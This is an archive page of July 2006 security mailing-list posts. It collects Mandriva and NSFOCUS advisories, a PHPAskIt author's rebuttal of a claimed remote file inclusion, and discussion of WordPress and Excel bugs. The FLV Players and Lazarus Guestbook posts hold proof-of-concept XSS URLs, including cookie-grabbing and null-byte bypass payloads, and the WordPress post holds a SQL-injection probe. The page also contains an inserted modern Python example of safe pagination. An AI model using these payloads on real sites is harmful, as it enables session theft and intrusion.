Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.

2006-07-12 Thread amelie
This vulnerability does not exist. Even with register_globals on, $dir and 
$qadir are overridden by a static variable within the script itself.


[ MDKSA-2006:121 ] - Updated xine-lib packages fix buffer overflow vulnerability

2006-07-12 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:121
 http://www.mandriva.com/security/
 ___
 
 Package : xine-lib
 Date: July 12, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause 
 a denial of service (application crash) and possibly execute arbitrary code 
 via the (1) send_command, (2) string_utf16, (3) get_data, and (4) 
 get_media_packet functions, and possibly other functions. Xine-lib contains
 an embedded copy of the same vulnerable code. 
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 34c23d8a858d2a2687297e25618c7b04  
2006.0/RPMS/libxine1-1.1.0-9.6.20060mdk.i586.rpm
 57f9a069b8fc968a12ce24605390c1f1  
2006.0/RPMS/libxine1-devel-1.1.0-9.6.20060mdk.i586.rpm
 7c2652ce586d087793536649d7da6966  
2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.i586.rpm
 37eff9bda8595acfbaf80e0998db1c9e  
2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.i586.rpm
 e5672e6558978051f6878dea6ba961b5  
2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.i586.rpm
 6527706516fb99a53f82d2c8c4b2e5f8  
2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.i586.rpm
 10d172825fdd5dd2dd92dfafd5d60e23  
2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.i586.rpm
 87b9a38b877b67f0ac0ee4f58ed50983  
2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.i586.rpm
 8656ea92b3fca51e2fad861ea963b14d  
2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.i586.rpm
 6a538ee35d785dfc7ea64a03c20060da  
2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.i586.rpm
 9defa64950f2feebab9dda16d35523cb  
2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.i586.rpm
 d207307cb338b46edd703797b693ea24  
2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.i586.rpm
 4dc1623162c6092eb10c755ed2c5366a  
2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 8798915891b79ac134565f8ede0653b1  
x86_64/2006.0/RPMS/lib64xine1-1.1.0-9.6.20060mdk.x86_64.rpm
 dcd2eb828f921b04206124835eeada8e  
x86_64/2006.0/RPMS/lib64xine1-devel-1.1.0-9.6.20060mdk.x86_64.rpm
 a933644c1c56d642a5d576cb217d0356  
x86_64/2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.x86_64.rpm
 238d8526e618dff3aa31e223c14ce432  
x86_64/2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.x86_64.rpm
 d9f0269ae701936ce27b6515e5c73ac1  
x86_64/2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.x86_64.rpm
 4683507048ec6535c2c5f63997ec719d  
x86_64/2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.x86_64.rpm
 bc649ad82f11c8422f1e9fb711dd4803  
x86_64/2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.x86_64.rpm
 52fe1d4ddeeea6ec91a776ccacf5df19  
x86_64/2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.x86_64.rpm
 348cc9ecf59e378b3d1c6aa12a35f9b9  
x86_64/2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.x86_64.rpm
 d2f2300e0bd4e4e210bbfae485c07624  
x86_64/2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.x86_64.rpm
 afca19bc708fc5964c19fff3a2d16286  
x86_64/2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.x86_64.rpm
 ba7c60488a4459066ba4ed08046ce48c  
x86_64/2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.x86_64.rpm
 4dc1623162c6092eb10c755ed2c5366a  
x86_64/2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm

 Corporate 3.0:
 1390c15ca893041af1076e6a02d14f47  
corporate/3.0/RPMS/libxine1-1-0.rc3.6.12.C30mdk.i586.rpm
 ecc53b859629edd48ef27b477332889e  
corporate/3.0/RPMS/libxine1-devel-1-0.rc3.6.12.C30mdk.i586.rpm
 a4d85795d05266793fa61ba6bc986aa6  
corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.i586.rpm
 4dd4249d6b1911501ddcfa1ef36470af  
corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.i586.rpm
 c9a3f82dad17f32a6ab6c0b1926c52c1  
corporate/3.0/RPMS/xine-dxr3-1-0.rc3.6.12.C30mdk.i586.rpm
 c40b65dd7cde826b8bfa5fb5720d15ed  
corporate/3.0/RPMS/xine-esd-1-0.rc3.6.12.C30mdk.i586.rpm
 2a257f092fe4b304be7e358230aa0361  
corporate/3.0/RPMS/xine-flac-1-0.rc3.6.12.C30mdk.i586.rpm
 b04b482c8693272f7ead71ac3ce91e7f  
corporate/3.0/RPMS/xine-gnomevfs-1-0.rc3.6.12.C30mdk.i586.rpm
 ae63549d198004056aacacee5b2ccbef  
corporate/3.0/RPMS/xine-plugins-1-0.rc3.6.12.C30mdk.i586.rpm
 d8fe8f9dff1190413e81e82e67762462  
corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.12.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 aad2ac9345e05d900910b8beade5ff21  
x86_64/corporate/3.0/RPMS/lib64xine1-1-0.rc3.6.12.C30mdk.x86_64.rpm
 b9540819f0250a2924297ce0388f6202  
x86_64/corporate/3.0/RPMS/lib64xine1-devel-1-0.rc3.6.12.C30mdk.x86_64.rpm
 53cc9dc911be64bf8764d76262df4a44  
x86_64/corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.x86_64.rpm
 280b7a7ceb168225d30eb97e95f45fb6  
x86_64/corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.x86_64.rpm
 4e3811096df50e37e6b10f

FLV Players Multiple Input Validation Vulnerabilities

2006-07-12 Thread xzerox
Product : FLV Players 8

Website : http://www.videospark.com


[+] Fullpath Disclosure :


1) http://localhost/flv8/paginate.php


Fatal error: Class simplepagemaker: Cannot inherit from undefined class object 
in /var/www/zero/httpdocs/flv8/paginate.php on line 45


2) http://localhost/flv8/player.php?p=somthing


Fatal error: SimplePageMaker::make() - out of bounds in page chihaja in 
/var/www/zero/httpdocs/flv8/paginate.php on line 131



[+] Multiple Cross Site Scripting 


PoC :


 http://localhost/flv8/player.php?url=[XSS]

 http://localhost/flv8/popup.php?url=%3C/title%3E[XSS]

 http://localhost/flv8/popup.php?url=%22%3E%3C[XSS]


Mourad 


Contact : [EMAIL PROTECTED]


Moroccan Security Research Team


NSFOCUS SA2006-05 : Microsoft Excel SELECTION Record Memory Corruption Vulnerability

2006-07-12 Thread NSFOCUS Security Team
NSFOCUS Security Advisory (SA2006-05)

Microsoft Excel SELECTION Record Memory Corruption Vulnerability 

Release Date: 2006-07-12

CVE ID: CVE-2006-1302

http://www.nsfocus.com/english/homepage/research/0605.htm

Affected systems & software
===
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003

Unaffected systems & software
===


Summary
=

NSFocus Security Team discovered a memory corruption vulnerability in Microsoft 
Excel's processing of the SELECTION record, which allows remote attackers to run 
arbitrary code via carefully crafted Excel files. 

Description


Excel does not perform sufficient checks on a certain field when processing the 
SELECTION record. During some data copying operations the user-supplied data 
might be used for the copy, resulting in memory corruption and arbitrary 
code execution. 

Attackers can craft an Excel file with a malformed SELECTION record and lure 
users into opening it via instant messaging tools, e-mail or other vectors, 
resulting in arbitrary code execution with the privileges of the user. If the 
user is the administrator, then attackers might take complete control over the 
system. 

Workaround
=

Do not open any Excel file from untrusted sources. 

Vendor Status
==

2006.03.30  Informed the vendor
2006.04.03  Vendor confirmed the vulnerability
2006.07.11  Microsoft has released a security bulletin (MS06-037) and related 
patches. 

For more details about the security bulletin, please refer to: 
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Additional Information


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-1302 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===

Wen Yujie of NSFocus Security Team found the vulnerability.

DISCLAIMS
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA



Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.

2006-07-12 Thread Amelie

Hi there,

I would like to point out that the security vulnerability quoted below 
(and seen here: 
http://archives.neohapsis.com/archives/bugtraq/2006-06/0234.html - 
submitted to bugtraq on June 12, 2006) concerning the CodeGrrl.com 
script, PHPAskIt, is incorrect. I am the author of this script and can 
confidently say that no such hack can take place through the 
convertaa.php and convertwakqa.php files. This has been fully tested by 
myself and others when we became aware of the supposed vulnerability. 
The reason why a file inclusion cannot take place through the query 
string is because $qadir and $dir are defined within the script. Even 
with register_globals on, any instance of these variables declared as 
part of the query string (convertaa.php?qadir=[url to malicious script], 
for example) will be overwritten with the version in the script. The 
files work as such:


convertaa.php:

<?php
$qadir = "/home/user/public_html/somefolder/"; // Ask&Answer installation path (WITH trailing slash)

if (file_exists($qadir . "config.php")) { // checking for config.php in this folder and including it if it exists
   include($qadir . "config.php");
}
else { // if it doesn't exist
   die("Error: Ask&Answer's config.php could not be found. Please make sure this file exists in the directory you have specified and try again.");
}

//database conversion happens here

?>

convertwakqa.php:

<?php
$dir = "/home/user/public_html/somefolder/"; // replace with absolute path to your Wak's A&A directory (WITH SLASH AT THE END!)

if (file_exists($dir . "functions.php")) { // checking for a functions.php file in the above directory and including it if it exists
   include($dir . "functions.php");
}
else {
   die("Error: Wak's Ask&Answer's functions.php could not be found. Please make sure this file exists in your Wak's Ask&Answer directory.");
}
if (file_exists("../config.php")) { // checking for config.php in the parent folder and including it if it exists
   include("../config.php");
}
else {
   die("Error: Could not find PHPAskIt's config.php. Without this file, the script cannot operate. Please make sure it exists.");
}

//database conversion

?>


As you can see, $dir and $qadir are defined and cannot be overwritten by 
additional variables in the GET array, or query string.


Furthermore, PHPAskIt 2.0+ will not run if any of the import files are 
left in place.


Please could you notify readers of any sites that may list this 
vulnerability that it is a hoax. CodeGrrl.com has recently come under 
fire for similar vulnerabilities in older scripts, and, being that 
PHPAskIt was released AFTER those were discovered, it was imperative 
that this sort of thing was avoided. Quite frankly I find it insulting 
that somebody has decided that I would be capable of leaving such a 
large security hole in my script when it was written a good three years 
after most of CodeGrrl.com's previous scripts, which contained a 
multiple file inclusion vulnerability in their password protection file, 
protection.php. I would never have left such an obvious hole in my own 
script.
It is our (CodeGrrl.com's) belief that people are spreading rumours 
about our newer scripts in an effort to further tarnish the site's 
reputation. However, PHPAskIt is NOT VULNERABLE TO REMOTE FILE INCLUSION.


Thank you for clearing this up on your site(s),

Amelie

CodeGrrl.com Staff


- Original Message 

#
# /\/\!|_|_! |-|4|23|<47 #
#

# Milli-Harekat Advisory ( www.milli-harekat.org )

# PHPAskIt <== v2.0.1 - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : PHPAskIt v2.0.1

# Credits : ERNE erne[at]ernealizm[dot]com

# Thanks : 
Dj_ReMix,The_bekir,SpC-x,Eskobar,LiZ0zim,EntRýk4,Korsan.Di_lejyoner and 
All MHG USERS


# Vulnerable :

http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir=[evil_scripts] 



http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir=[evil_scripts] 






Re: WordPress 2.0.3 SQL Error and Full Path Disclosure

2006-07-12 Thread zck zck

Isn't this actually an SQL Injection rather than information leakage?

Try :
http://localhost/wordpress/index.php?paged=%27

I mean, the error message (this time in English) is:
WordPress database error: [You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '-10, 10' at line 1]

It specifically says that "You have an error in your SQL syntax",
which means my input goes into the query...

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Sunday, July 02, 2006 12:15
To: bugtraq@securityfocus.com
Subject: WordPress 2.0.3 SQL Error and Full Path Disclosure

WordPress 2.0.3 SQL Error and Full Path Disclosure
Discovered By zero [Moroccan Security Team]
Software: WordPress 2.0.3
Site : www.wordpress.org

~ SQL Error ~

Example:

http://localhost/wordpress/index.php?paged=-1

Result:

WordPress database error: [Erreur de syntaxe près de '-20, 10' à la
ligne 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <=
'2006-06-29 12:46:59' AND (post_status = "publish") AND post_status !=
"attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT -20, 10


~ Full path ~

/wp-settings.php
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/upgrade-functions.php
/wp-admin/upgrade-schema.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/livejournal.php
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-content/plugins/hello.php
/wp-content/plugins/wp-db-backup.php
/wp-content/plugins/akismet/akismet.php
/wp-content/themes/classic/index.php
/wp-content/themes/classic/comments.php
/wp-content/themes/classic/comments-popup.php
/wp-content/themes/classic/footer.php
/wp-content/themes/classic/header.php
/wp-content/themes/classic/sidebar.php
/wp-content/themes/default/index.php
/wp-content/themes/default/404.php
/wp-content/themes/default/archive.php
/wp-content/themes/default/archives.php
/wp-content/themes/default/attachment.php
/wp-content/themes/default/comments-popup.php
/wp-content/themes/default/footer.php
/wp-content/themes/default/functions.php
/wp-content/themes/default/header.php
/wp-content/themes/default/links.php
/wp-content/themes/default/page.php
/wp-content/themes/default/search.php
/wp-content/themes/default/searchform.php
/wp-content/themes/default/sidebar.php
/wp-content/themes/default/single.php
/wp-includes/default-filters.php
/wp-includes/kses.php
/wp-includes/locale.php
/wp-includes/rss-functions.php
/wp-includes/template-loader.php
/wp-includes/vars.php
/wp-includes/wp-db.php


Greetz:

simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure,
hunter, themenotor ...

Contact:

Author: Mourad [ zero ]
Email : xzerox(at)linuxmail(dot)org
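As an added illustration of the point argued in this thread (this is not WordPress code, and it takes no position on how WordPress itself handled paged): the pagination parameter is converted to a bounded integer before any SQL is built, and LIMIT and OFFSET are passed as bound parameters rather than pasted into the query text, so neither a negative number nor a quote character can reach the statement. Python with sqlite3 and a constructed posts table; the schema, page size and upper page bound are assumptions of this example.

```python
import re
import sqlite3
from typing import List, Optional

POSTS_PER_PAGE = 10   # assumed page size
MAX_PAGE = 100_000    # assumed upper bound; keeps the OFFSET arithmetic sane


def parse_paged(raw: Optional[str]) -> int:
    """Turn the raw `paged` query-string value into a 1-based page number.

    Anything that is not a plain positive decimal integer falls back to
    page 1. A negative value (the LIMIT -20, 10 seen in the thread) or a
    quote character therefore never reaches the SQL text at all.
    """
    if raw is None or not re.fullmatch(r"[1-9][0-9]{0,6}", raw):
        return 1
    return min(int(raw), MAX_PAGE)


def page_offset(paged: int) -> int:
    """Row offset for a 1-based page number."""
    return (paged - 1) * POSTS_PER_PAGE


def fetch_page(conn: sqlite3.Connection, raw_paged: Optional[str]) -> List[int]:
    """Return the post ids on the requested page, newest first."""
    paged = parse_paged(raw_paged)
    # LIMIT and OFFSET are bound parameters, not string concatenation.
    sql = "SELECT id FROM posts ORDER BY post_date DESC LIMIT ? OFFSET ?"
    try:
        rows = conn.execute(sql, (POSTS_PER_PAGE, page_offset(paged))).fetchall()
    except sqlite3.Error:
        # A driver error belongs in the server log, never in the HTTP response:
        # the thread started from exactly such an echoed database error.
        return []
    return [row[0] for row in rows]


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table with 25 posts dated 2006-07-01 .. 2006-07-25."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, post_date TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO posts (id, post_date) VALUES (?, ?)",
        [(i, "2006-07-%02d" % i) for i in range(1, 26)],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    for raw in ("3", "-1", "'", "abc"):
        print("paged=%-5r -> page %d: %s" % (raw, parse_paged(raw), fetch_page(db, raw)))
```

With the constructed table, page 1 is posts 25 down to 16 and page 3 is posts 5 down to 1; the values -1 and ' both collapse to page 1 instead of producing a syntax error.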


New CVE number states Excel Style handling as a separate issue

2006-07-12 Thread Juha-Matti Laurio

New CVE document
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3431

published recently confirms the information that the Microsoft Excel Style handling 
vulnerability, aka the Nanika.xls issue, is a separate vulnerability.
The vulnerability mentioned affects only the Simplified Chinese, Traditional 
Chinese, Japanese and Korean versions of Excel.

This vulnerability (let's say the 4th Excel vulnerability) uses Repair Mode too, and 
user interaction is needed.
This information has been updated in my First Microsoft Excel 0-day 
Vulnerability FAQ document at SecuriTeam Blogs.

If a fix for this vulnerability is included in the monthly July updates from Microsoft, 
it's expected that this CVE-2006-3431
is listed in the upcoming security bulletin to clarify the situation.

So-called 1st Excel code execution vulnerability reported in June is
http://www.microsoft.com/technet/security/advisory/921365.mspx
and
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3059

- Juha-Matti


NSFOCUS SA2006-06 : Microsoft Excel COLINFO Record Buffer Overflow Vulnerability

2006-07-12 Thread NSFOCUS Security Team
NSFOCUS Security Advisory (SA2006-06)

Microsoft Excel COLINFO Record Buffer Overflow Vulnerability

Release Date: 2006-07-12

CVE ID: CVE-2006-1304

http://www.nsfocus.com/english/homepage/research/0606.htm

Affected systems & software
===
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003

Unaffected systems & software
===


Summary
=

NSFocus Security Team discovered a buffer overflow vulnerability in Microsoft 
Excel's processing of the COLINFO record, which allows remote attackers to run 
arbitrary code via carefully crafted Excel files.

Description


Excel does not perform sufficient checks on a certain field when processing the 
COLINFO record, which might cause a buffer overflow in a data filling 
operation. Attackers can run arbitrary code via carefully crafted data.

Attackers can craft an Excel file with a malformed COLINFO record and lure 
users into opening it via instant messaging tools, e-mail or other vectors, 
resulting in arbitrary code execution with the privileges of the user. If the 
user is the administrator, then attackers might take complete control over the 
system. 

Workaround
=

Do not open any Excel file from untrusted sources. 

Vendor Status
==

2006.03.30  Informed the vendor
2006.04.03  Vendor confirmed the vulnerability
2006.07.11  Microsoft has released a security bulletin (MS06-037) and related 
patches. 

For more details about the security bulletin, please refer to: 
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Additional Information


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-1304 to this issue. This is a candidate for inclusion in the 
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===

Wen Yujie of NSFocus Security Team found the vulnerability.

DISCLAIMS
==
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA



[ MDKSA-2006:120 ] - Updated samba packages fix DoS vulnerability

2006-07-12 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:120
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: July 10, 2006
 Affected: 10.2, 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A vulnerability in samba 3.0.x was discovered where an attacker could
 cause a single smbd process to bloat, exhausting memory on the system.
 This bug is caused by continually increasing the size of an array which
 maintains state information about the number of active share
 connections.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403
 http://www.samba.org/samba/security/CAN-2006-3403.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 3eb4f4fe83862cc464bec94f345b1205  
10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm
 20257c42dc31bfa2c7528e7033485aeb  
10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm
 4abbb93b864aec424b863085e4cd17fe  
10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm
 54c14b19aeda54fb096766938dcd7ba0  
10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.i586.rpm
 6a718136f97f343c1673e9e82aa6685c  10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.i586.rpm
 e0f0ca5db168dbec2ee78c47b04d4dfe  
10.2/RPMS/samba-client-3.0.13-2.1.102mdk.i586.rpm
 aca4da8c53f090b9e41bd95690d95a27  
10.2/RPMS/samba-common-3.0.13-2.1.102mdk.i586.rpm
 80c6725741baa3386e8d15a552a2e5aa  
10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.i586.rpm
 ef137687ddad3bee055d6d3870e74db8  
10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.i586.rpm
 226357f0e98fa1c3b8abe17a23d1f715  
10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.i586.rpm
 80a8107ea3f020bc930ecde070aefb61  
10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.i586.rpm
 e2d6e9fa08e770f08171d75dd1079d5a  
10.2/RPMS/samba-server-3.0.13-2.1.102mdk.i586.rpm
 62043615a61aa9424cee64634f6f8d95  
10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.i586.rpm
 b76512984b8268a6c1d6474dd623c405  
10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.i586.rpm
 21f24f6b6d4ba6ebdaf259c9ad2ff894  
10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.i586.rpm
 268ecfc08e5cd02ec69b2c3df9a79e3c  
10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.i586.rpm
 469c6f7ac18bb3f3e963b15d6ddb218b  
10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.i586.rpm
 3cfae3f4e389c05b161fc03447fe8ea1  10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 1cabdda84ee642347b89b39f9b20647f  
x86_64/10.2/RPMS/lib64smbclient0-3.0.13-2.1.102mdk.x86_64.rpm
 ac3ed439d87acb15e3c2e29c43a6c15c  
x86_64/10.2/RPMS/lib64smbclient0-devel-3.0.13-2.1.102mdk.x86_64.rpm
 62220c9ea9b521ae9255351f9d2e9a72  
x86_64/10.2/RPMS/lib64smbclient0-static-devel-3.0.13-2.1.102mdk.x86_64.rpm
 3eb4f4fe83862cc464bec94f345b1205  
x86_64/10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm
 20257c42dc31bfa2c7528e7033485aeb  
x86_64/10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm
 4abbb93b864aec424b863085e4cd17fe  
x86_64/10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm
 e3ee798596a4c1a3986046100967082d  
x86_64/10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.x86_64.rpm
 f7cc4e909f28d48b265c11be4ea910d7  
x86_64/10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.x86_64.rpm
 4740a0c21ac308c552611a5ee347c72a  
x86_64/10.2/RPMS/samba-client-3.0.13-2.1.102mdk.x86_64.rpm
 6115c746181eaeb5c0d1d507c116a6db  
x86_64/10.2/RPMS/samba-common-3.0.13-2.1.102mdk.x86_64.rpm
 ff054b178cff6c783fc730ca9c6ada5f  
x86_64/10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.x86_64.rpm
 c6e65bf57165bdc7f438e92ec9bd7823  
x86_64/10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.x86_64.rpm
 abf978ba0e1a53d0bc7c9938787d57f5  
x86_64/10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.x86_64.rpm
 8d3dcc5cfd15c7401bd0c1835b2ede77  
x86_64/10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.x86_64.rpm
 47c818ab47d1a18e3fe2bdc44d7c3916  
x86_64/10.2/RPMS/samba-server-3.0.13-2.1.102mdk.x86_64.rpm
 0d64c5d745416788db5c1e879f04ae03  
x86_64/10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.x86_64.rpm
 fb96a98a1ec0fa08001e0ecb155bb243  
x86_64/10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.x86_64.rpm
 06d7c44374d9ba8cde7077da3d6908c7  
x86_64/10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.x86_64.rpm
 d7349d986a8b2b602c2c74d405571c27  
x86_64/10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.x86_64.rpm
 a7b8792e6ee53529f84dbb2c42431396  
x86_64/10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.x86_64.rpm
 3cfae3f4e389c05b161fc03447fe8ea1  
x86_64/10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 b639e531c8aa76a45bb4fd7fc0c9d08f  
2006.0/RPMS/libsmbclient0-3.0.20-3.1.20060mdk.i586.rpm
 21d7c1bcdae8ba923815557a265aed8c  
2006.0/RPMS/libsm

Lazarus Guestbook Cross Site Scripting Vulnerabilities

2006-07-12 Thread simo64
Product : Lazarus Guestbook

Website : http://carbonize.co.uk/Lazarus/

Version : <= 1.6

Problem : Cross Site Scripting


1) 

The first problem is in codes-english.php: the "show" parameter in 
lang/codes-english.php isn't properly sanitised.

This can be exploited to execute arbitrary HTML and javascript code.


 Vulnerable code in lang/codes-english.php near line 4


1  

2  

3  

4   


Exploit : 


http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3Ealert(document.cookie);



2)

The second problem is in picture.php: the script first verifies that the image file 
exists, and then displays it.


vulnerable code : in picture.php




24  if (!empty($_GET['img'])) {

26  if (file_exists("$GB_TMP/$_GET[img]")) {

27  $size = @GetImageSize("$GB_TMP/$_GET[img]");

28  $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";

29  }

..  

49  

50  \n";

53}

54?>

55





If magic_quotes_gpc = OFF we can bypass this protection by specifying an 
existing image file (Example: "img/home.gif") and using a null char (%00).



POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]



file_exists("$GB_TMP/$_GET[img]") will return true and the html code will be 
executed.



Exploit: 



http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]


http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3Ealert(document.cookie);



Contact : simo64[at]gmail[dot]com

